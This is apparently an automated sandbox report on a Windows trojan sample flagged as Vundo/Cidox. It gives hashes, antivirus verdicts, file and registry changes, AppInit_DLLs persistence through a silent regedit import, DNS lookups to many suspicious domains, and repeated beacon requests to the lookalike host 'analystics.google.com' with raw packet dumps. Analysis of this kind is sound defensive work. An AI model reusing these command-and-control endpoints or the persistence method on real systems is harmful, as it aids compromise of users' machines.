Analysis Date2015-01-16 14:53:17
MD56b0f8f8fd31ed93d014a1cddc4c12508
SHA1c56d2b79547993eda2f078ce40a74c9d6f00f7b5

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 39ca738295cda88fc3b233f44b152ed6 sha1: dcd50dcadd83426b2e0852326db32024851deedc size: 27136
SectionCODE md5: d53336ee81ccd2781d60add0b62c51d8 sha1: 6f2dfbd532b3ace3f8cff2f0e4b4800a4e5c6a2c size: 2048
Section.rdata md5: b200b9db1b3934cba342556264a9ecac sha1: f8046252d55de540586c9249c57b423bedda5871 size: 7680
Section.data md5: e856b13c77c01dadbd1fe8339d2fc82e sha1: 05938f1099c688126c2cda3899e937f719ad442a size: 3584
Section.rsrc md5: f68c62420509c4049a3681bb4f4f1f43 sha1: 5482ce6c4be68f8c0db7e33644979924d473d757 size: 155648
Timestamp2013-01-29 13:30:01
PackerMicrosoft Visual C++ ?.?
PEhash4a981d283e0fec8994cd34c11532c9e2567014b3
IMPhash152e2db9b04356fc6c48553e7fc552e1
AV360 Safeno_virus
AVAd-AwareTrojan.Generic.KDZ.5634
AVAlwil (avast)no_virus
AVArcabit (arcavir)Trojan.Generic.KDZ.5634
AVAuthentiumW32/Backdoor.PPTG-6933
AVAvira (antivir)TR/Dldr.Vundo.jpoiu
AVBullGuardTrojan.Generic.KDZ.5634
AVCA (E-Trust Ino)Win32/Vundo.IIL
AVCAT (quickheal)Trojan.Vundo.Gen
AVClamAVno_virus
AVDr. WebTrojan.Mayachok.18397
AVEmsisoftTrojan.Generic.KDZ.5634
AVEset (nod32)Win32/Citirevo.AE
AVFortinetW32/Cidox.AUBN!tr
AVFrisk (f-prot)W32/Backdoor2.HQZV
AVF-SecureTrojan.Generic.KDZ.5634
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cidox
AVK7Backdoor ( 04c513e51 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.Agent.CH
AVMcafeeVundo-FBDM!6B0F8F8FD31E
AVMicrosoft Security EssentialsTrojan:Win32/Vundo
AVMicroWorld (escan)Trojan.Generic.KDZ.5634
AVRisingno_virus
AVSophosTroj/Vundo-BE
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)BScope.Trojan-Dropper.Injector

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\system32\mfvrtem.dll
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNSknockdast.com
Winsock DNSclickbeta.ru
Winsock DNSknolidzes.com
Winsock DNS91.220.35.154
Winsock DNSveroconma.com
Winsock DNSterrans.su
Winsock DNSgetinball.com
Winsock DNStheloamva.com
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdentagod.com
Winsock DNSdenareclick.com
Winsock DNSdebijonda.com
Winsock DNSfescheck.com
Winsock DNSliteworns.com
Winsock DNSgetintsu.com
Winsock DNSnshouse1.com
Winsock DNSnetrovad.com
Winsock DNSvengibit.com
Winsock DNStryangets.com
Winsock DNSgeodeline.com
Winsock DNSvornedix.com
Winsock DNSinzavora.com
Winsock DNSgetavodes.com
Winsock DNSdegoog1etag.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\mfvrtem.dll\\x00

Network Details:

DNSknockdast.com
Type: A
208.73.210.210
DNSknockdast.com
Type: A
208.73.211.179
DNSknockdast.com
Type: A
208.73.211.199
DNSknockdast.com
Type: A
208.73.210.204
DNSgeodeline.com
Type: A
208.73.210.214
DNSgeodeline.com
Type: A
208.73.210.217
DNSgeodeline.com
Type: A
208.73.211.178
DNSgeodeline.com
Type: A
208.73.210.200
DNSdebijonda.com
Type: A
209.99.40.222
DNSveroconma.com
Type: A
74.117.179.241
DNStheloamva.com
Type: A
209.222.14.3
DNSvornedix.com
Type: A
209.222.14.3
DNSdentagod.com
Type: A
209.222.14.3
DNSliteworns.com
Type: A
209.222.14.3
DNSvengibit.com
Type: A
209.222.14.3
DNStryangets.com
Type: A
209.222.14.3
DNSgetintsu.com
Type: A
109.234.109.82
DNSinzavora.com
Type: A
109.234.109.76
DNSknolidzes.com
Type: A
DNSdegoog1etag.com
Type: A
DNSgetinball.com
Type: A
DNSgetavodes.com
Type: A
DNStryatdns.com
Type: A
DNSfescheck.com
Type: A
DNSnetrovad.com
Type: A
DNSterrans.su
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSnshouse1.com
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYMck4weTn5Px
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYL3l+jNCUZgx
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYOscjgrZdOl0
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYOmGy11cMSpu
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYOmGy11cMSpu
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYOmxwAWH/XzT
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYOmxwAWH/XzT
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYFv1T+Cx22P6
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYOJ3QlTh8o48
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYOJ3QlTh8o48
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYOJ3QlTh8o48
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYOJ3QlTh8o48
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=796&av=0&vm=0&al=0&p=427&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwfDF33rFvPvoyDHj2yoiyB6GTTL+EsjYFu/B0w5v/GB
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 208.73.210.210:80
Flows TCP192.168.1.1:1032 ➝ 208.73.210.214:80
Flows TCP192.168.1.1:1033 ➝ 209.99.40.222:80
Flows TCP192.168.1.1:1034 ➝ 74.117.179.241:80
Flows TCP192.168.1.1:1035 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1036 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1037 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1038 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1039 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1040 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1041 ➝ 109.234.109.82:80
Flows TCP192.168.1.1:1042 ➝ 109.234.109.76:80
Flows TCP192.168.1.1:1043 ➝ 91.220.35.154:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 39362661   XX0000&key=796&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   34323726 6f733d35 2e312e32 3630302e   427&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677766 44463333 72467650 766f7944   ygwfDF33rFvPvoyD
0x000000b0 (00176)   486a3279 6f697942 36475454 4c2b4573   Hj2yoiyB6GTTL+Es
0x000000c0 (00192)   6a594d63 6b347765 546e3550 78204854   jYMck4weTn5Px HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 39362661   XX0000&key=796&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   34323726 6f733d35 2e312e32 3630302e   427&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677766 44463333 72467650 766f7944   ygwfDF33rFvPvoyD
0x000000b0 (00176)   486a3279 6f697942 36475454 4c2b4573   Hj2yoiyB6GTTL+Es
0x000000c0 (00192)   6a594c33 6c2b6a4e 43555a67 78204854   jYL3l+jNCUZgx HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 39362661   XX0000&key=796&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   34323726 6f733d35 2e312e32 3630302e   427&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677766 44463333 72467650 766f7944   ygwfDF33rFvPvoyD
0x000000b0 (00176)   486a3279 6f697942 36475454 4c2b4573   Hj2yoiyB6GTTL+Es
0x000000c0 (00192)   6a594f73 636a6772 5a644f6c 30204854   jYOscjgrZdOl0 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 39362661   XX0000&key=796&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   34323726 6f733d35 2e312e32 3630302e   427&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677766 44463333 72467650 766f7944   ygwfDF33rFvPvoyD
0x000000b0 (00176)   486a3279 6f697942 36475454 4c2b4573   Hj2yoiyB6GTTL+Es
0x000000c0 (00192)   6a594f6d 47793131 634d5370 75204854   jYOmGy11cMSpu HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 39362661   XX0000&key=796&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   34323726 6f733d35 2e312e32 3630302e   427&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677766 44463333 72467650 766f7944   ygwfDF33rFvPvoyD
0x000000b0 (00176)   486a3279 6f697942 36475454 4c2b4573   Hj2yoiyB6GTTL+Es
0x000000c0 (00192)   6a594f6d 47793131 634d5370 75204854   jYOmGy11cMSpu HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 39362661   XX0000&key=796&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   34323726 6f733d35 2e312e32 3630302e   427&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677766 44463333 72467650 766f7944   ygwfDF33rFvPvoyD
0x000000b0 (00176)   486a3279 6f697942 36475454 4c2b4573   Hj2yoiyB6GTTL+Es
0x000000c0 (00192)   6a594f6d 78774157 482f587a 54204854   jYOmxwAWH/XzT HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 39362661   XX0000&key=796&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   34323726 6f733d35 2e312e32 3630302e   427&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677766 44463333 72467650 766f7944   ygwfDF33rFvPvoyD
0x000000b0 (00176)   486a3279 6f697942 36475454 4c2b4573   Hj2yoiyB6GTTL+Es
0x000000c0 (00192)   6a594f6d 78774157 482f587a 54204854   jYOmxwAWH/XzT HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 39362661   XX0000&key=796&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   34323726 6f733d35 2e312e32 3630302e   427&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677766 44463333 72467650 766f7944   ygwfDF33rFvPvoyD
0x000000b0 (00176)   486a3279 6f697942 36475454 4c2b4573   Hj2yoiyB6GTTL+Es
0x000000c0 (00192)   6a594676 31542b43 78323250 36204854   jYFv1T+Cx22P6 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 39362661   XX0000&key=796&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   34323726 6f733d35 2e312e32 3630302e   427&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677766 44463333 72467650 766f7944   ygwfDF33rFvPvoyD
0x000000b0 (00176)   486a3279 6f697942 36475454 4c2b4573   Hj2yoiyB6GTTL+Es
0x000000c0 (00192)   6a594f4a 33516c54 68386f34 38204854   jYOJ3QlTh8o48 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 39362661   XX0000&key=796&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   34323726 6f733d35 2e312e32 3630302e   427&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677766 44463333 72467650 766f7944   ygwfDF33rFvPvoyD
0x000000b0 (00176)   486a3279 6f697942 36475454 4c2b4573   Hj2yoiyB6GTTL+Es
0x000000c0 (00192)   6a594f4a 33516c54 68386f34 38204854   jYOJ3QlTh8o48 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 39362661   XX0000&key=796&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   34323726 6f733d35 2e312e32 3630302e   427&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677766 44463333 72467650 766f7944   ygwfDF33rFvPvoyD
0x000000b0 (00176)   486a3279 6f697942 36475454 4c2b4573   Hj2yoiyB6GTTL+Es
0x000000c0 (00192)   6a594f4a 33516c54 68386f34 38204854   jYOJ3QlTh8o48 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 39362661   XX0000&key=796&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   34323726 6f733d35 2e312e32 3630302e   427&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79677766 44463333 72467650 766f7944   ygwfDF33rFvPvoyD
0x000000b0 (00176)   486a3279 6f697942 36475454 4c2b4573   Hj2yoiyB6GTTL+Es
0x000000c0 (00192)   6a594f4a 33516c54 68386f34 38204854   jYOJ3QlTh8o48 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d37 39362661   XX0000&key=796&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   34323726 6f733d35 2e312e32 3630302e   427&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
